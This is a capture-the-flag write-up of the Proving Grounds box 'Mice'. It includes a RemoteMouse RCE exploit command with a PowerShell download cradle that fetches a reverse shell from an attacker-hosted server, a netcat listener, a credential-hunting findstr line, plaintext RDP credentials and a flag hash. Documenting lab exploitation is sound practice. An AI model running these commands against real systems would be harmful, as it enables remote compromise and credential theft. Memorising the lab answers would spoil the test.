// htb writeup OffSec Proving Grounds 2026-02-25
Mice
HackTheBox Easy OffSec Proving Grounds
← all boxes
root obtained // PWNED

🧪 Machine Name: Mice

Platform: OffSec Proving Grounds
IP Address: 192.168.228.199
Difficulty: Easy

🧭 Overview

This PG machine exposes RemoteMouse and other uncommon ports. RemoteMouse 3.008 is known to be vulnerable to RCE. We leverage that to gain an initial foothold via a PowerShell reverse shell, then discover FileZilla credentials and escalate to Administrator via a known LPE vulnerability. Screenshots prove both user and root access.

🔍 Enumeration

🔎 Nmap

nmap -p- --min-rate 10000 192.168.228.199
PORT     STATE SERVICE
1978/tcp open  remotemouse
1979/tcp open  unisql-java
1980/tcp open  pearldoc-xact
3389/tcp open  ms-wbt-server
7680/tcp open  pando-pub

nmap -p 1978,1979,1980,3380,7680 -sCV -oN nmapscan 192.168.228.199

⚙️ Exploitation – RemoteMouse RCE

🔁 Hosted revshell:

# PowerShell revshell saved as own.ps1
sudo python3 -m http.server 80

🐭 Trigger exploit:

./RemoteMouse-3.008-Exploit.py --target-ip 192.168.228.199 \
  --cmd "powershell -c \"iex (New-Object Net.WebClient).DownloadString('http://192.168.45.206:80/own.ps1')\""

🖥️ Netcat shell (User)

nc -lvnp 443
whoami → remote-pc\divine
hostname → Remote-PC
type Desktop\local.txt → `7b179f432c64ed054f461afac5c5bdb0`

Mice Local Proof

🪜 Privilege Escalation

🔍 Credential Discovery

findstr /S /I /C:"pass" *.ini *.cfg *.config *.xml

🎮 RDP login:

xfreerdp3 /v:192.168.228.199 /u:"divine" /p:"ControlFreak11" /f

⬆️ Admin Privesc – RemoteMouse GUI LPE

📷 Proof

ClamAV Proof

💡 Lessons Learned

“Writeup and proof included in GitHub repo: https://github.com/inkedqt/ctf-writeups/tree/main/Other/PG/Mice”

← all boxes 0x74617465.sh blue team →